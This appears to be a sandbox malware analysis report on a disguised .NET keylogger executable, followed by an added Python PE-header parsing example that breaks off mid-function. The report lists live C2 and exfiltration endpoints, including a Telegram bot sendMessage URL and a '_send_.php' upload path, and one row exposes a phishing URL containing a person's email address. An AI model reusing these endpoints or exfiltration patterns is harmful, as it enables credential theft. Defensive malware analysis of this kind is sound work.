http://crl.micros4 | pre-stowage.PDF.scr.exe, 00000004.00000002.3769722427.00000000061D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text= | pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en | pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002ABA000.00000004.00000800.00020000.00000000.sdmp; pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://varders.kozow.com:8081 | pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp; pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp; pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://aborters.duckdns.org:8081 | pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp; pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp; pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://anotherarmy.dns.army:8081 | pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp; pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp; pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/q | pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp; pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
                                                                  https://chrome.google.com/webstore?hl=enlBpre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002AC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/8.46.123.189$pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.00000000029AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://reallyfreegeoip.orgpre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002980000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.00000000029F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepre-stowage.PDF.scr.exe, 00000000.00000002.1319452030.0000000003021000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20apre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedpre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.org/xml/pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
172.67.177.134 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576531
Start date and time: 2024-12-17 08:32:47 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: pre-stowage.PDF.scr.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@3/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 103
• Number of non-executed functions: 30
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 4.245.163.56
• Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target pre-stowage.PDF.scr.exe, PID 6896 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
02:33:45 | API Interceptor | 10047706x Sleep call for process: pre-stowage.PDF.scr.exe modified
02:33:48 | API Interceptor | 16x Sleep call for process: powershell.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  149.154.167.220HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                            l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      193.122.130.0HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      checkip.dyndns.comHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 193.122.130.0
                                                                                                      hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 132.226.247.73
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 193.122.130.0
                                                                                                      Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 158.101.44.242
                                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 193.122.6.168
                                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 193.122.6.168
                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 158.101.44.242
                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 158.101.44.242
                                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                      • 132.226.8.169
                                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 193.122.130.0
                                                                                                      api.telegram.orgHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      reallyfreegeoip.orgHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 188.114.97.3
                                                                                                      Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 104.21.67.152
                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 172.67.177.134
                                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                      • 172.67.177.134
                                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      TELEGRAMRUHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      69633f.msiGet hashmaliciousVidarBrowse
                                                                                                      • 149.154.167.99
                                                                                                      Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                      • 149.154.167.99
QUOTATION REQUEST - BQS058.exe | malicious | MassLogger RAT | 149.154.167.220
Match: ORACLE-BMC-31898US
  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
  ldr.ps1 | malicious | GO Miner, Xmrig | 147.154.227.160
  PURCHASE ORDER TRC-0909718-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 193.122.130.0
  end.exe | malicious | Unknown | 130.61.86.87
  Justificante pago-09453256434687.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 158.101.44.242
  pedido-035241.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 158.101.44.242
  QUOTATION REQUEST - BQS058.exe | malicious | MassLogger RAT | 193.122.6.168
  FT876567090.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
  REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | 158.101.44.242
  ref_97024130865.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.130.0
Match: CLOUDFLARENETUS
  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
  https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.za | malicious | HTMLPhisher | 104.18.11.207
  Assinar_PDF_3476.lNK.lnk | malicious | Unknown | 104.21.32.1
  hesaphareketi-01.pdf.exe | malicious | Snake Keylogger | 104.21.67.152
  Sublabially.vbs | malicious | Remcos, GuLoader | 172.67.210.11
  Brokerage Invoice.pdf.vbs | malicious | Unknown | 104.21.2.70
  DHL.exe | malicious | FormBook | 104.21.48.233
  SFHgtxFGtB.ps1 | malicious | Unknown | 104.21.87.65
  DG55Gu1yGM.exe | malicious | LummaC | 104.21.56.70
  he55PbvM2G.exe | malicious | LummaC | 104.21.56.70
Match; each row: Associated Sample Name / URL | Detection | Threat Name | Context
Match: 54328bd36c14bd82ddaa0c04b25ed9ad
  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.177.134
  hesaphareketi-01.pdf.exe | malicious | Snake Keylogger | 172.67.177.134
  PURCHASE ORDER TRC-0909718-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 172.67.177.134
  Justificante pago-09453256434687.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
  pedido-035241.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
  QUOTATION REQUEST - BQS058.exe | malicious | MassLogger RAT | 172.67.177.134
  FT876567090.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.177.134
  REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | 172.67.177.134
  PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | malicious | VIP Keylogger | 172.67.177.134
  ref_97024130865.exe | malicious | MassLogger RAT, PureLog Stealer | 172.67.177.134
Match: 3b5074b1b5d032e5620f69f9f700ff0e
  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.za | malicious | HTMLPhisher | 149.154.167.220
  Sublabially.vbs | malicious | Remcos, GuLoader | 149.154.167.220
  Brokerage Invoice.pdf.vbs | malicious | Unknown | 149.154.167.220
  Nueva orden de compra-836528268278278.xlsx.exe | malicious | Unknown | 149.154.167.220
  Order129845.exe | malicious | AgentTesla | 149.154.167.220
  SFHgtxFGtB.ps1 | malicious | Unknown | 149.154.167.220
  Nueva orden de compra-836528268278278.xlsx.exe | malicious | Unknown | 149.154.167.220
  fsg5PWtTm2.lnk | malicious | RedLine, SectopRAT | 149.154.167.220
  seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta | malicious | Cobalt Strike, Remcos | 149.154.167.220
                                                                                                      No context
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2232
                                                                                                      Entropy (8bit):5.380805901110357
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YPUyus:lGLHyIFKL3IZ2KRH9OugQs
                                                                                                      MD5:D0EF8E4DD120F790DD4A5434452024B2
                                                                                                      SHA1:2C48DCEC4D2B6914EC9D50CFD9C252F4ACA64E86
                                                                                                      SHA-256:8F8FB9D5320955882AC16C0025398A4443496B123BB532D92CFA80E78BB98497
                                                                                                      SHA-512:B1022D646EDFDFAD447992363C54EA5D270A8EEEFD2730BE56143BBB8B24945AC65D2AFCECC7600431362773921C8809B57A6364B8FF3C640B47FDF41B6E71EA
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.648475375844033
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                      File name:pre-stowage.PDF.scr.exe
                                                                                                      File size:907'264 bytes
                                                                                                      MD5:68dfd91fce9ad3d728a7c25716990edd
                                                                                                      SHA1:6a6843531a77b77892813360b3daf0b0bbfea8c2
                                                                                                      SHA256:525248e53005e0ec5a39b4aa00c2323e9f5be5a256ddd944707aba1b3dedba58
                                                                                                      SHA512:cb16e579c818d63d4be0798211ef3d4f36728804280920d4508366d5a65c2c6c237452fc7cce112c8baba49f481b89c132e9accee541eab26424bfd80df63049
                                                                                                      SSDEEP:12288:GqktMolx2euSXxT4lfsvAt75PAXfZ0mA4t3Rx5Z5MpaXv0cWP2vMPku+l0CPP:gtZPpXStlaRNJJRb8pqvmPd+p
                                                                                                      TLSH:5F15CFC0373AB711CE6CA6708826EDB853652E787000F9E66DDE27D7759DB126A08F06
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag..............0.................. ........@.. .......................@............@................................
                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                      Entrypoint:0x4dea06
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x67611ABB [Tue Dec 17 06:31:23 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
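The static fields above can be checked against a sample you hold rather than taken on trust. The Python below is an added example and is not part of the Joe Sandbox report: it parses the PE32 header fields the report lists (compile timestamp, entrypoint VA, subsystem, file and DLL characteristics, version fields, CLR runtime directory) and computes Shannon entropy. It runs on a constructed header blob that carries only the values shown for pre-stowage.PDF.scr.exe, not on the sample itself, and the 7.2 entropy threshold is an assumed triage heuristic, not a standard. Feed `parse_pe32` the bytes of a real file to compare with a report.

```python
"""Added example: reproduce the static PE header fields a sandbox report lists.

Not part of the Joe Sandbox report. The header blob built below is
constructed for this example and carries only the values the report shows
(timestamp, entrypoint, image base, DLL characteristics, version fields,
CLR directory present); it is not the sample and contains no code.
"""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# IMAGE_FILE_HEADER.Characteristics and IMAGE_OPTIONAL_HEADER.DllCharacteristics
# bit names, from the PE/COFF specification.
FILE_CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE", 0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH",
    0x0800: "NO_BIND", 0x1000: "APPCONTAINER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
ENTROPY_PACKED_HINT = 7.2  # assumed triage threshold for "packed/encrypted", not a spec value


def flag_names(value: int, table: dict) -> list:
    """Decode a bit field into the names of the set bits, lowest bit first."""
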